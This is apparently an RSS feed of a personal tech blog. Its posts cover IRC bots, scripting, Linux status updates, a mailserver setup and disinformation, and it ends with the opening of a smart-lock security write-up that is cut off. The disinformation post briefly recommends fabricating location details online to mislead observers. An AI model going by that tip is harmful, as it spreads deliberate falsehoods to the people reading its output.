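For a sense of how simple plain sockets + IRC is, here’s a bare-bones sketch of the approach (not detotated’s actual code; the network, nick and channel are placeholders, and the .np handler is a stub):

#!/usr/bin/env python3
# Bare-bones plain-socket IRC bot; placeholders throughout.
import socket

HOST, PORT = "irc.rizon.net", 6667
NICK, CHAN = "tinybot", "#crimson"

sock = socket.socket()
sock.connect((HOST, PORT))

def send(line):
    # IRC messages are CRLF-terminated
    sock.sendall((line + "\r\n").encode())

send(f"NICK {NICK}")
send(f"USER {NICK} 0 * :{NICK}")

buf = ""
while True:
    buf += sock.recv(4096).decode(errors="ignore")
    *lines, buf = buf.split("\r\n")
    for line in lines:
        if line.startswith("PING"):
            # answer keepalives or get disconnected
            send("PONG " + line.split(" ", 1)[1])
        elif " 001 " in line:
            # registration complete; join the channel
            send(f"JOIN {CHAN}")
        elif "PRIVMSG" in line and line.endswith(".np"):
            # a real bot would hit the last.fm API here
            send(f"PRIVMSG {CHAN} :now playing: (stub)")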

Other

I’ve been reading some more manga, I’ll update the reading log when I, well… get around to it. Haven’t had time to do much in the past few weeks—the time at the end of a semester tends to get pretty tight. Here’s what I plan to get back to during this winter break:

  • Russian!
  • Window manager in Nim
  • vite rewrite, probably
  • The other blog posts in queue

I’ve also put off doing any “security work” for a while now, perhaps that’ll change this December. Or whenever.

With that ends my status update, on all things that I haven’t done.

]]>
https://icyphox.sh/blog/2019-11-16Sat, 16 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/2019-11-16
IRC for DMsNerdy and I decided to try and use IRC for our daily communications, as opposed to non-free alternatives like WhatsApp or Telegram. This is an account of how that went.

The status quo of instant messaging apps

I’ve tried a ton of messaging applications—Signal, WhatsApp, Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently, DeltaChat.

Signal: It straight up sucks on Android. Not to mention the centralized architecture, and OWS’s refusal to federate.

WhatsApp: Facebook’s spyware that people use without a second thought. The sole reason I have it installed is for University’s class groups; I can’t wait to graduate.

Telegram: Centralized architecture and a closed-source server. It’s got a very nice Android client, though.

Jami: Distributed platform, free software. I am not going to comment on this because I don’t recall what my experience was like, but I’m not using it now… so if that’s indicative of anything.

Matrix (Riot): Distributed network. Multiple client implementations. Overall, pretty great, but it’s slow. I’ve had messages not send / not received a lot of times. Matrix + Riot excels in group communication, but really sucks for one-to-one chats.

Slack / Discord: sigh

DeltaChat: Pretty interesting idea—on paper. Using existing email infrastructure for IM sounds great, but it isn’t all that cash in practice. Email isn’t instant; there’s always a delay of give or take 5 to 10 seconds, if not more. This affects the flow of conversation. I might write a small blog post later, reviewing DeltaChat.2

Why IRC?

It’s free, in all senses of the word. A lot of others have done a great job of answering this question in further detail, this is by far my favourite:

https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html

Using IRC’s private messages

This was the next obvious choice, but personal message buffers don’t persist in ZNC and it’s very annoying to have to do a /query nerdypepper (Weechat) or to search and message a user via Revolution IRC. The only unexplored option—using a channel.

Setting up a channel for DMs

A fairly easy process:

  • Set modes (on Rizon)1:

    #crimson [+ilnpstz 3]
    

    In essence, this limits the users to 3 (one bot), sets the channel to invite only, hides the channel from /whois and /list, and a few other misc. modes.

  • Notifications: Also a trivial task; a quick modification to lnotify.py to send a notification for all messages in the specified buffer (#crimson) did the trick for Weechat. Revolution IRC, on the other hand, has an option to setup rules for notifications—super convenient.

  • A bot: Lastly, a bot for a few small tasks—fetching URL titles, responding to .np (now playing) etc. Writing an IRC bot is dead simple, and it took me about an hour or two to get most of the basic functionality in place. The source is here. It is by no means “good code”; it breaks spectacularly from time to time.

In conclusion

As the subtitle suggests, using IRC has been great. It’s probably not for everyone though, but it fits my (and Nerdy’s) usecase perfectly.

P.S.: I’m not sure why the footnotes are reversed.


  1. Channel modes on Rizon

  2. It’s in queue

]]>
https://icyphox.sh/blog/irc-for-dmsSun, 03 Nov 2019 00:00:00 +0000https://icyphox.sh/blog/irc-for-dms
The intelligence conundrumI watched the latest S.W.A.T. episode a couple of days ago, and it highlighted some interesting issues that intelligence organizations face when working with law enforcement. Side note: it’s a pretty good show if you like police procedurals.

The problem

Consider the following scenario:

  • There’s a local drug lord who’s been recruited by a certain 3-letter organization to provide intel.
  • Local PD busts his operation and proceed to arrest him.
  • 3-letter org steps in, wants him released.

So here’s the thing: his presence is a threat to the public, but at the same time, he can be a valuable long-term asset—giving info on drug inflow, exchanges, and perhaps even actionable intel on bigger fish higher up the ladder. But he also seeks security. The 3-letter org must provide him with protection in case he’s blown. And, like in our case, they’d have to step in if he gets arrested.

Herein lies the problem. How far should an intelligence organization go to protect an asset? Who matters more, the people they’ve sworn to protect, or the asset? Because after all, in the bigger picture, local PD and intel orgs are on the same side.

Thus, the question arises—how can we measure the “usefulness” of an asset to better quantify the tradeoff that is to be made? Is the intel gained worth the loss of public safety? This question remains largely unanswered, and is quite the predicament should you find yourself in it.

This was a fairly short post, but an interesting problem to ponder nonetheless.

]]>
https://icyphox.sh/blog/intel-conundrumMon, 28 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/intel-conundrum
Hacky scriptsAs a CS student, I see a lot of people around me doing courses online to learn to code. Don’t get me wrong—it probably works for some. Everyone learns differently. But that’s only going to get you so far. Great, you know the syntax and can solve some competitive programming problems, but that’s not quite enough, is it? The actual learning comes from applying it to solving actual problems—not made-up ones. (inb4 some seething CP bro comes at me)

Now, what’s an actual problem? Some might define it as real world problems that people out there face, and solving it probably requires building a product. This is what you see in hackathons, generally.

If you ask me, however, I like to define it as problems that you yourself face. This could be anything. Heck, it might not even be a “problem”. It could just be an itch that you want to scratch. And this is where hacky scripts come in. Unclear? Let me illustrate with a few examples.

Now playing status in my bar

If you weren’t aware already—I rice my desktop. A lot. And a part of this cohesive experience I try to create involves a status bar up at the top of my screen, showing the time, date, volume and battery statuses etc.

So here’s the “problem”. I wanted to have my currently playing song (Spotify), show up on my bar. How did I approach this? A few ideas popped up in my head:

  • Send playerctl’s STDOUT into my bar
  • Write a Python script to query Spotify’s API
  • Write a Python/shell script to query Last.fm’s API

The first approach bombed instantly. playerctl didn’t recognize my Spotify client and whined about some dbus issues to top it off. I spent a while in that rabbit hole but eventually gave up.

My next avenue was the Spotify Web API. One look at the docs and I realize that I’ll have to make more than one request to fetch the artist and track details. Nope, I need this to work fast.

Last resort—Last.fm’s API. Spoiler alert: this worked. Also, arguably the best choice, since it shows the track status regardless of where the music is being played. Here’s the script in its entirety:

#!/usr/bin/env bash
# now playing
# requires the last.fm API key

source ~/.lastfm    # `export API_KEY="<key>"`
fg="$(xres color15)"
light="$(xres color8)"

USER="icyphox"
URL="http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks"
URL+="&user=$USER&api_key=$API_KEY&format=json&limit=1&nowplaying=true"
NOTPLAYING=" "    # I like to have it show nothing
RES=$(curl -s $URL)
NOWPLAYING=$(jq '.recenttracks.track[0]."@attr".nowplaying' <<< "$RES" | tr -d '"')


if [[ "$NOWPLAYING" = "true" ]]
then
    TRACK=$(jq '.recenttracks.track[0].name' <<< "$RES" | tr -d '"')
    ARTIST=$(jq '.recenttracks.track[0].artist."#text"' <<< "$RES" | tr -d '"')
    echo -ne "%{F$light}$TRACK %{F$fg}by $ARTIST"
else
    echo -ne "$NOTPLAYING"
fi

The source command is used to fetch the API key, which I store at ~/.lastfm. The fg and light variables can be ignored; they’re only for coloring output on my bar. The rest is fairly trivial and just involves JSON parsing with jq. That’s it! It’s so small, but I learnt a ton. For those curious, here’s what it looks like running:

now playing status polybar
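
And the slice of the Last.fm response that the jq calls above pick apart looks roughly like this (trimmed to the relevant fields; values are placeholders):

$ curl -s "$URL" | jq '.recenttracks.track[0]'
{
  "artist": { "#text": "some artist" },
  "name": "some track",
  "@attr": { "nowplaying": "true" }
}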

Update latest post on the index page

This pertains to this very blog that you’re reading. I wanted a quick way to update the “latest post” section in the home page and the blog listing, with a link to the latest post. This would require editing the Markdown source of both pages.

This was a very interesting challenge to me, primarily because it requires in-place editing of the file, not just appending. Sure, I could’ve come up with some sed one-liner, but that didn’t seem very fun. Also I hate regexes. Did a lot of research (read: Googling) on in-place editing of files in Python, sorting lists of files by modification time, etc., and this is what I ended up with, ultimately:

#!/usr/bin/env python3

from markdown2 import markdown_path
import os
import fileinput
import sys

# change our cwd
os.chdir("bin")

blog = "../pages/blog/"

# get the most recently created file
def getrecent(path):
    files = [path + f for f in os.listdir(blog) if f not in ["_index.md", "feed.xml"]]
    files.sort(key=os.path.getmtime, reverse=True)
    return files[0]

# adding an entry to the markdown table
def update_index(s):
    path = "../pages/_index.md"
    with open(path, "r") as f:
        md = f.readlines()
    ruler = md.index("|  --  | --: |\n")
    md[ruler + 1] = s + "\n"

    with open(path, "w") as f:
        f.writelines(md)

# editing the md source in-place
def update_blog(s):
    path = "../pages/blog/_index.md"
    s = s + "\n"
    for l in fileinput.FileInput(path, inplace=1):
        if "--:" in l:
            l = l.replace(l, l + s)
        print(l, end=""),


# fetch title and date
meta = markdown_path(getrecent(blog), extras=["metadata"]).metadata
fname = os.path.basename(os.path.splitext(getrecent(blog))[0])
url = "/blog/" + fname
line = f"| [{meta['title']}]({url}) | `{meta['date']}` |"

update_index(line)
update_blog(line)

I’m going to skip explaining this one out, but in essence, it’s one massive hack. And in the end, that’s my point exactly. It’s very hacky, but the sheer amount I learnt by writing this ~50 line script can’t be taught anywhere.

This was partially how vite was born. It was originally intended to be a script to build my site, but grew into a full-blown Python package. I could’ve just used an off-the-shelf static site generator given that there are so many of them, but I chose to write one myself.

And that just about sums up what I wanted to say. The best and most fun way to learn to code—write hacky scripts. You heard it here.

]]>
https://icyphox.sh/blog/hacky-scriptsThu, 24 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/hacky-scripts
Status updateI’ve decided to drop the “Weekly” part of the status update posts, since they were never weekly and—let’s be honest—they aren’t going to be. These posts are, henceforth, just “Status updates”. The date range can be inferred from the post date.

That said, here’s what I’ve been up to!

Void Linux

Yes, I decided to ditch Alpine in favor of Void. Alpine was great, really. The very comfy apk, ultra mnml system… but having to maintain a chroot for my glibc needs was getting way too painful. And the package updates are so slow! Heck, they’re still on kernel 4.xx on their supposed “bleeding” edge repo.

So yes, Void Linux it is. Still a very clean system. I’m loving it. I also undervolted my system using undervolt (-95 mV). Can’t say for sure if there’s a noticeable difference in battery life though. I’ll see if I can run some tests.

This should be the end of my distro hopping. Hopefully.

PyCon

Yeah yeah, enough already. Read my previous post.

This website

I’ve moved from GitHub Pages over to Netlify. This isn’t my first time using Netlify, though; I used to host my old blog, which ran Hugo, there. I was tired of doing this terrible hack to maintain a single repo for both my source (master) and deploy (gh-pages) branches. In essence, here’s what I did:

#!/usr/bin/env bash

git push origin master
# push contents of `build/` to the `gh-pages` branch
git subtree push --prefix build origin gh-pages

I can now simply push to master, and Netlify generates a build for me by installing vite, and running vite build. Very pleasant.
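
The Netlify side of that is a few lines of configuration, something along these lines in a netlify.toml (the command and publish directory here are assumptions; the same settings can also be set in the web UI):

[build]
  command = "pip3 install vite && vite build"
  publish = "build"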

mnmlwm’s status

mnmlwm, for those unaware, is my pet project which aims to be a simple window manager written in Nim. I’d taken a break from it for a while because Xlib is such a pain to work with (or I’m just dense). Anyway, I’m planning on getting back to it, with some fresh inspiration from Dylan Araps’ sowm.

Other

I’ve been reading a lot of manga lately. Finished Kekkon Yubiwa Monogatari (till the latest chapter) and Another, and I’ve just started Kakegurui. I’ll reserve my opinions for when I update the reading log.

That’s about it, and I’ll see you—definitely not next week.

]]>
https://icyphox.sh/blog/2019-10-17Wed, 16 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/2019-10-17
PyCon India 2019 wrap-upI’m writing this article as I sit in class, back on the grind. Last weekend—Oct 12th and 13th—was PyCon India 2019, in Chennai, India. It was my first PyCon, and my first ever talk at a major conference! This is an account of all the cool stuff I saw, people I met and the talks I enjoyed. Forgive the lack of pictures—I prefer living the moment through my eyes.

Talks

So much ML! Not that it’s a bad thing, but definitely interesting to note. From what I counted, there were about 17 talks tagged under “Data Science, Machine Learning and AI”. I’d have liked to see more talks discussing security and privacy, but hey, the organizers can only pick from what’s submitted. ;)

With that point out of the way, here are some of the talks I really liked:

  • Python Packaging–where we are and where we’re headed by Pradyun
  • Micropython: Building a Physical Inventory Search Engine by Vinay
  • Ragabot–Music Encoded by Vikrant
  • Let’s Hunt a Memory Leak by Sanket
  • oh and of course, David Beazley’s closing keynote

My talk (!!!)

My good buddy Raghav and I spoke about our smart lock security research. Agreed, it might have been less “hardware” and more of a bug on the server-side, but that’s the thing about IoT right? It’s so multi-faceted, and is an amalgamation of so many different hardware and software stacks. But, anyway…

I was reassured by folks after the talk that the silence during Q/A was the “good” kind of silence. Was it really? I’ll never know.

Some nice people I met

  • Abhirath—A 200 IQ lad. Talked to me about everything from computational biology to the physical implementation of quantum computers.
  • Abin—He recognized me from my r/unixporn posts, which was pretty awesome.
  • Abhishek
  • Pradyun and Vikrant (linked earlier)

And a lot of other people doing really great stuff, whose names I’m forgetting.

Pictures!

It’s not much, and I can’t be bothered to format them like a collage or whatever, so I’ll just dump them here—as is.

nice badge awkward smile! me talking s443 @ pycon

C’est tout

Overall, a great time and a weekend well spent. It was very different from your typical security conference—a lot more chill, if you will. The organizers did a fantastic job and the entire event was put together really well. I don’t have much else to say, but I know for sure that I’ll be there next time.

That was PyCon India, 2019.

]]>
https://icyphox.sh/blog/pycon-wrap-upTue, 15 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/pycon-wrap-up
Thoughts on digital minimalismAh yes, yet another article on the internet on this beaten to death subject. But this is inherently different, since it’s my opinion on the matter, and my technique(s) to achieve “digital minimalism”.

According to me, minimalism can be achieved on two primary fronts -- the phone & the computer. Let’s start with the phone. The daily carry. The device that’s on our person from when we get out of bed, till we get back in bed.

The phone

I’ve read about a lot of methods people employ to curb their phone usage. Some have tried grouping “distracting” apps into a separate folder, and this supposedly helps reduce their usage. Now, I fail to see how this would work, but YMMV. Another technique I see often is using a time governance app—like OnePlus’ Zen Mode—to enforce how much time you spend using specific apps, or the phone itself. I’ve tried this for myself, but I constantly found myself counting down the minutes after which the phone would become usable again. Not helpful.

My solution to this is a lot more brutal. I straight up uninstalled the apps that I found myself using too often. There’s a simple principle behind it—if the app has a desktop alternative, like Twitter, Reddit, etc. use that instead. Here’s a list of apps that got nuked from my phone:

  • Twitter
  • Instagram (an exception, no desktop client)
  • Relay for Reddit
  • YouTube (disabled, ships with stock OOS)

The only non-productive app that I’ve let remain is Clover, a 4chan client. I didn’t find myself using it as much earlier, but we’ll see how that holds up. I’ve also allowed my personal messaging apps to remain, since removing those would be inconveniencing others.

I must admit, I often find myself reaching for my phone out of habit just to check Twitter, only to find that it’s gone. I also subconsciously tap the place where its icon used to exist (now replaced with my mail client) on my launcher. The only “fun” thing left on my phone to do is read or listen to music. Which is okay, in my opinion.

The computer

I didn’t do anything too nutty here; the minimalism is mostly aesthetic. I like UIs that get out of the way.

My setup right now is just a simple bar at the top showing the time, date, current volume and battery %, along with my workspace indicators. No fancy colors, no flashy buttons and sliders. And that’s it. I don’t try to force myself to not use stuff—after all, I’ve reduced it elsewhere. :)

Now the question arises: Is this just a phase, or will I stick to it? What’s going to stop me from heading over to the Play Store and installing those apps back? Well, I never said this was going to be easy. There’s definitely some will power needed to pull this off. I guess time will tell.

]]>
https://icyphox.sh/blog/digital-minimalismSat, 05 Oct 2019 00:00:00 +0000https://icyphox.sh/blog/digital-minimalism
Weekly status update, 09/17–09/27It’s a lazy Friday afternoon here; yet another off day this week thanks to my uni’s fest. My last “weekly” update was 10 days ago, and a lot has happened since then. Let’s get right into it!

My switch to Alpine

Previously, I ran Debian with Buster/Sid repos, and ever since this happened

$ dpkg --list | wc -l
3817

# or something in that ballpark

I’ve been wanting to reduce my system’s package count.

Thus, I began my search for a smaller, simpler and lighter distro with a fairly sane package manager. I did come across Dylan Araps’ KISS Linux project, but it seemed a little too hands-on for me (and still relatively new). I finally settled on Alpine Linux. According to their website:

Alpine Linux is a security-oriented, lightweight Linux distribution based on musl libc and busybox.

The installation was a breeze, and I was quite surprised to see WiFi working OOTB. In the past week of my using this distro, the only major hassle I faced was getting my Minecraft launcher to run. The JRE isn’t fully ported to musl yet.1 The solution to that is fairly trivial and I plan to write about it soon. (hint: it involves chroots)

rice

Packaging for Alpine

On a related note, I’ve been busy packaging some of the stuff I use for Alpine -- you can see my personal aports repository if you’re interested. I’m currently working on packaging Nim too, so keep an eye out for that in the coming week.

Talk selection at PyCon India!

Yes! My buddy Raghav (@_vologue) and I are going to be speaking at PyCon India about our recent smart lock security research. The conference is happening in Chennai, much to our convenience. If you’re attending too, hit me up on Twitter and we can hang!

Other

That essentially sums up the technical stuff that I did. My Russian is going strong; my reading, however, hasn’t. I have yet to finish those books! This week, for sure.

Musically, I’ve been experimenting. I tried a bit of hip-hop and chilltrap, and I think I like it? I still find myself coming back to metalcore/deathcore. Here’s a list of artists I discovered (and liked) recently:

That’s it for now, I’ll see you next week!

]]>
https://icyphox.sh/blog/2019-09-27Fri, 27 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/2019-09-27
Weekly status update, 09/08–09/17This is something new I’m trying out, in an effort to write more frequently and to serve as a log of how I’m using my time. In theory, I will write this post every week. I’ll need someone to hold me accountable if I don’t. I have yet to decide on a format for this, but it will probably include a quick summary of the work I did, things I read, IRL stuff, etc.

With the meta stuff out of the way, here’s what went down last week!

My discovery of the XXIIVV webring

Did you notice the new fidget-spinner-like logo at the bottom? Click it! It’s a link to the XXIIVV webring. I really like the idea of webrings. It creates a small community of sites and enables sharing of traffic among these sites. The XXIIVV webring consists mostly of artists, designers and developers and gosh, some of those sites are beautiful. Mine pales in comparison.

The webring also has a twtxt echo chamber aptly called The Hallway. twtxt is a fantastic project and its complexity-to-usefulness ratio greatly impresses me. You can find my personal twtxt feed at /twtxt.txt (root of this site).
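
For the unfamiliar: a twtxt feed is nothing but a plain text file, with one tab-separated timestamp and message per line (the entries below are made up):

2019-09-17T21:30:00+05:30	Figuring out this twtxt thing.
2019-09-17T21:42:00+05:30	Turns out it really is just a text file.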

Which brings me to the next thing I did this/last week.

twsh: a twtxt client written in Bash

I’m not a fan of the official Python client, because you know, Python is bloat. As an advocate of mnmlsm, I can’t use it in good conscience. Thus began my authorship of a truly mnml client in pure Bash. You can find it here. It’s not entirely usable as of yet, but it’s definitely getting there, with the help of @nerdypepper.

Other

I have been listening to my usual podcasts: Crime Junkie, True Crime Garage, Darknet Diaries & Off the Pill. To add to this list, I’ve begun binging Vice’s CYBER. It’s pretty good—each episode is only about 30 mins and it hits the sweet spot, delivering both interesting security content and news.

My reading needs a ton of catching up. Hopefully I’ll get around to finishing up “The Unending Game” this week. And then go back to “Terrorism and Counterintelligence”.

I’ve begun learning Russian! I’m really liking it so far, and it’s been surprisingly easy to pick up. Learning the Cyrillic script will require some relearning, especially with letters like в, н, р, с, etc. that look like English but sound entirely different. I think I’m pretty serious about learning this language—I’ve added the Russian keyboard to my Google Keyboard to aid my familiarization with the alphabet. I’ve added the RU layout to my keyboard map too:

setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru

With that ends my weekly update, and I’ll see you next week!

]]>
https://icyphox.sh/blog/2019-09-17Tue, 17 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/2019-09-17
Disinformation demystifiedAs with the disambiguation of any word, let’s start with its etymology and definiton. According to Wikipedia, disinformation has been borrowed from the Russian word — dezinformatisya (дезинформа́ция), derived from the title of a KGB black propaganda department.

Disinformation is false information spread deliberately to deceive.

To fully understand disinformation, especially in the modern age, we need to understand the key factors of any successful disinformation operation:

  • creating disinformation (what)
  • the motivation behind the op, or its end goal (why)
  • the medium used to disperse the falsified information (how)
  • the actor (who)

At the end, we’ll also look at how you can use disinformation techniques to maintain OPSEC.

In order to break monotony, I will also be using the terms “information operation”, or the shortened forms—“info op” & “disinfo”.

Creating disinformation

Crafting or creating disinformation is by no means a trivial task. Often, the quality of any disinformation sample is a huge indicator of the level of sophistication of the actor involved, i.e. is it a 12 year old troll or a nation state?

Well crafted disinformation always has one primary characteristic — “plausibility”. The disinfo must sound reasonable. It must induce the notion it’s likely true. To achieve this, the target — be it an individual, a specific demographic or an entire nation — must be well researched. A deep understanding of the target’s culture, history, geography and psychology is required. It also needs circumstantial and situational awareness, of the target.

There are many forms of disinformation. A few common ones are staged videos / photographs, recontextualized videos / photographs, blog posts, news articles & most recently — deepfakes.

Here’s a tweet from the grugq, showing a case of recontextualized imagery:

Motivations behind an information operation

I like to broadly categorize any info op as either proactive or reactive. Proactively, disinformation is spread with the desire to influence the target either before or during the occurrence of an event. This is especially observed during elections.1 In offensive information operations, the target’s psychological state can be affected by spreading fear, uncertainty & doubt, or FUD for short.

Reactive disinformation is when the actor, usually a nation state in this case, screws up and wants to cover their tracks. A fitting example of this is the case of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over eastern Ukraine. This tragic incident has been attributed to Russian-backed separatists.2 Russian media is known to have disseminated a number of alternative & some even conspiratorial theories3 in response. The number grew as the JIT’s (Dutch-lead Joint Investigation Team) investigations pointed towards the separatists. The idea was to muddle the information space with these theories, and as a result, potentially correct information takes a credibility hit.

Another motive for an info op is to control the narrative. This is often seen in use in totalitarian regimes; when the government decides what the media portrays to the masses. The ongoing Hong Kong protests are a good example.4 According to NPR:

Official state media pin the blame for protests on the “black hand” of foreign interference, namely from the United States, and what they have called criminal Hong Kong thugs. A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters, who are demanding an end to an extradition bill with China and the ability to elect their own leader. Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience, this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police. …

Media used to disperse disinfo

As seen in the above example of totalitarian governments, national TV and newspaper agencies play a key role in influence ops en masse. It guarantees outreach due to the channel/paper’s popularity.

Twitter is another, obvious example. Due to the ease of creating accounts and the ability to generate activity programmatically via the API, Twitter bots are the go-to choice today for info ops. Essentially, an actor attempts to create “discussions” amongst “users” (read: bots), to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to get realtime insights into what sticks and what doesn’t. The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll factory — the Internet Research Agency (IRA) to create discussions about alternative theories.

In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties actively invest in creating group chats to spread political messages and memes. These parties have volunteers whose sole job is to sit and forward messages. Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases, this is disinformation without a motive, or the motive is hard to determine simply because the source is impossible to trace, lost in forwards.5 This is a difficult problem to combat, especially given the nature of the target audience.

The actors behind disinfo campaigns

I doubt this requires further elaboration, but in short:

  • nation states and their intelligence agencies
  • governments, political parties
  • other non/quasi-governmental groups
  • trolls

This essentially sums up the what, why, how and who of disinformation.

Personal OPSEC

This is a fun one. Now, it’s common knowledge that STFU is the best policy. But sometimes, this might not be possible, because, after all, inactivity leads to suspicion, and suspicion leads to scrutiny. Which might lead to your OPSEC being compromised. So if you really have to, you can feign activity using disinformation. For example, pick a place, and throw in subtle details pertaining to the weather, local events or regional politics of that place into your disinfo. Assuming this is Twitter, you can tweet stuff like:

  • “Ugh, when will this hot streak end?!”
  • “Traffic wonky because of the Mardi Gras parade.”
  • “Woah, XYZ place is nice! Especially the fountains by ABC street.”

Of course, if you’re a nobody on Twitter (like me), this is a non-issue for you.

And please, don’t do this:

mcafee opsecfail

Conclusion

The ability to influence someone’s decisions/thought process in just one tweet is scary. There is no simple way to combat disinformation. Social media is hard to control. Just like anything else in cyber, this too is an endless battle between social media corps and motivated actors.

A huge shoutout to Bellingcat for their extensive research in this field, and for helping folks see the truth in a post-truth world.


  1. This episode of CYBER talks about election influence ops (features the grugq!). 

  2. The Bellingcat Podcast’s season one covers the MH17 investigation in detail. 

  3. Wikipedia section on MH17 conspiracy theories 

  4. Chinese newspaper spreading disinfo 

  5. Use an adblocker before clicking this

]]>
https://icyphox.sh/blog/disinfoTue, 10 Sep 2019 00:00:00 +0000https://icyphox.sh/blog/disinfo
Setting up my personal mailserverA mailserver was a long time coming. I’d made an attempt at setting one up around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And I almost did this time too.1

For this attempt, I wanted a simpler approach. I recall how terribly confusing Dovecot & Postfix were to configure and hence I decided to look for a containerized solution, that most importantly, runs on my cheap $5 Digital Ocean VPS — 1 vCPU and 1 GB memory. Of which only around 500 MB is actually available. So yeah, pretty tight.

What’s available

Turns out, there are quite a few of these OOTB, ready-to-deploy solutions. These are the ones I came across:

  • poste.io: Based on an “open core” model. The base install is open source and free (as in beer), but you’ll have to pay for the extra stuff.

  • mailu.io: Free software. Draws inspiration from poste.io, but ships with a web UI that I didn’t need.

  • mailcow.email: These fancy domains are getting ridiculous. But more importantly they need 2 GiB of RAM plus swap?! Nope.

  • Mail-in-a-Box: Unlike the ones above, not a Docker-based solution but definitely worth a mention. It however, needs a fresh box to work with. A box with absolutely nothing else on it. I can’t afford to do that.

  • docker-mailserver: The winner.

So… docker-mailserver

The first thing that caught my eye in the README:

Recommended:

  • 1 CPU
  • 1GB RAM

Minimum:

  • 1 CPU
  • 512MB RAM

Fantastic, I can somehow squeeze this into my existing VPS. Setup was fairly simple & the docs are pretty good. It employs a single .env file for configuration, which is great. However, I did run into a couple of hiccups here and there.

One especially nasty one was docker / docker-compose running out of memory.

Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory

But it eventually worked after a couple of attempts.

The next thing I struggled with — DNS. Specifically, with the step where the DKIM keys are generated2. The output under
config/opendkim/keys/domain.tld/mail.txt
isn’t exactly CloudFlare friendly; it can’t be directly copy-pasted into a TXT record.

This is what it looks like.

mail._domainkey IN  TXT ( "v=DKIM1; h=sha256; k=rsa; "
      "p=<key>"
      "<more key>" )  ;  -- -- DKIM key mail for icyphox.sh

But while configuring the record, you set “Type” to TXT, “Name” to mail._domainkey, and the “Value” to what’s inside the parenthesis ( ), removing the quotes "". Also remove the part that appears to be a comment ; -- -- ....

To simplify debugging DNS issues later, it’s probably a good idea to point to your mailserver using a subdomain like mail.domain.tld using an A record. You’ll then have to set an MX record with the “Name” as @ (or whatever your DNS provider uses to denote the root domain) and the “Value” to mail.domain.tld. And finally, the PTR (pointer record, I think), which is the reverse of your A record — “Name” as the server IP and “Value” as mail.domain.tld. I learnt this part the hard way, when my outgoing email kept getting rejected by Tutanota’s servers.
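
Put together, the mail-related records end up looking roughly like this (zone-file style; the domain, IP and MX priority are placeholders):

mail.domain.tld.            A       203.0.113.10
domain.tld.                 MX 10   mail.domain.tld.
mail._domainkey.domain.tld. TXT     "v=DKIM1; h=sha256; k=rsa; p=<key><more key>"
10.113.0.203.in-addr.arpa.  PTR     mail.domain.tld.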

Yet another hurdle — SSL/TLS certificates. This isn’t documented very well, unless you read through the wiki and look at an example. In short, install certbot, have port 80 free, and run

$ certbot certonly --standalone -d mail.domain.tld

Once that’s done, edit the docker-compose.yml file to mount /etc/letsencrypt in the container, something like so:

...

volumes:
    - maildata:/var/mail
    - mailstate:/var/mail-state
    - ./config/:/tmp/docker-mailserver/
    - /etc/letsencrypt:/etc/letsencrypt

...

With this done, you shouldn’t have mail clients complaining about wonky certs for which you’ll have to add an exception manually.
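To be sure the container is actually presenting the Let’s Encrypt certificate (and not a self-signed default), you can peek at what gets served on IMAPS. A minimal sketch, assuming the standard port 993 and Python’s stock ssl module:

# check_tls.py -- print the certificate served on IMAPS (port 993)
import socket
import ssl

host = "mail.domain.tld"
ctx = ssl.create_default_context()  # verification fails loudly on a self-signed cert

with ctx.wrap_socket(socket.create_connection((host, 993)),
                     server_hostname=host) as s:
    cert = s.getpeercert()
    print(cert["subject"])   # should mention mail.domain.tld
    print(cert["notAfter"])  # expiry date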

Why would you…?

There are a few good reasons for this:

Privacy

No really, this is the best choice for truly private email. Not ProtonMail, not Tutanota. Sure, they claim so and I don’t dispute it. Quoting Drew DeVault3,

Truly secure systems do not require you to trust the service provider.

But you have to trust ProtonMail. They run open source software, but how can you really be sure that it isn’t a backdoored version of it?

When you host your own mailserver, you truly own your email without having to rely on any third-party. This isn’t an attempt to spread FUD. In the end, it all depends on your threat model™.

Decentralization

Email today is basically run by Google. Gmail has over 1.2 billion active users. That’s obscene. Email was designed to be decentralized, but big corps swooped in and made it a product. They now control your data, and it’s no secret that Google reads your mail. This again loops back to my previous point: privacy. Decentralization guarantees privacy: when you control your mail, you control who reads it.

Personalization

Can’t ignore this one. It’s cool to have a custom email address to flex.

x@icyphox.sh vs gabe.newell4321@gmail.com

Pfft, this is no competition.


  1. My tweet of frustration. 

  2. Link to step in the docs. 

  3. From his article on why he doesn’t trust Signal. 

]]>
https://icyphox.sh/blog/mailserverThu, 15 Aug 2019 00:00:00 +0000https://icyphox.sh/blog/mailserver
Picking the FB50 smart lock (CVE-2019-13143)(originally posted at SecureLayer7’s Blog, with my edits)

The lock

The lock in question is the FB50 smart lock, manufactured by Shenzhen Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands across many ecommerce sites, and has an estimated 15k+ users.

The lock pairs to a phone via Bluetooth, and requires the OKLOK app from the Play/App Store to function. The app requires the user to create an account before further functionality is available. It also facilitates configuring the fingerprint, and unlocking from within Bluetooth range.

We had two primary attack surfaces we decided to tackle—Bluetooth (BLE) and the Android app.

Via Bluetooth Low Energy (BLE)

Android phones can capture Bluetooth (HCI) traffic; this is enabled via Developer Options in Settings. We made around 4 “unlocks” from the Android phone, as seen in the screenshot.

wireshark packets

This is the value sent in the Write request:

wireshark write req

We attempted replaying these requests using gatttool and gattacker, but that didn’t pan out, since the value being written was encrypted.1

Via the Android app

